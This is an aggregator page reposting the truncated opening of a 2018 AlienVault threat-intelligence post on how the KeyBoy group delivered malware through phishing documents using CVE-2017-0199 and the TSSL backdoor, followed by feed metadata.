One Article Review
| Source |  AlienVault Blog |
|---|---|
| Identifiant | 837210 |
| Date de publication | 2018-10-08 17:09:00 (vue: 2018-10-08 21:02:36) |
| Titre | Delivery (Key)Boy |
| Texte |
Introduction
Below we’ve outlined the delivery phase of some recent attacks by KeyBoy, a group of attackers believe to operate out of China. They were first identified in 2013 targeting governments and NGOs in South East Asia. Their primary targeting continues to this day, though they have also been known to target more diverse victims such as the energy sector.
Malware Delivery through Open Source Exploit Kits
KeyBoy sent the following email to India's Ambassador to Ethiopia from an email address at nic[.]in, India's National Informatics Centre.
Boy_Open_Source_Exploit_Kits.png)
The file f43f60b62002d0700ccbcbd9334520b6
The attached malicious document downloads and executes a script that installs the final payload:
Boy_final_payload.png)
This script contains text (eg; “” ) which matches a pre-packed version of the popular CVE-2017-0199 exploit available on GitHub.
We’ve seen other malicious documents where KeyBoy have tested another exploit generator. In that case KeyBoy didn’t change the default settings so the document meta-data provides some obvious hints that the document is malicious:
Boy_Tested.png)
Delivered Malware
The next stage in these attacks is typically a malware family known as TSSL. This malware originally identified by PwC and more recently described by Trend Micro and CitizenLab.
Most samples are built on the attackers machine fr |
| Envoyé | Oui |
| Condensat | > border:0;margin:0;padding:0; boy com/i/email20 delivery feedblitz https://assets key png src= style= |
| Tags | |
| Stories | APT 23 |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.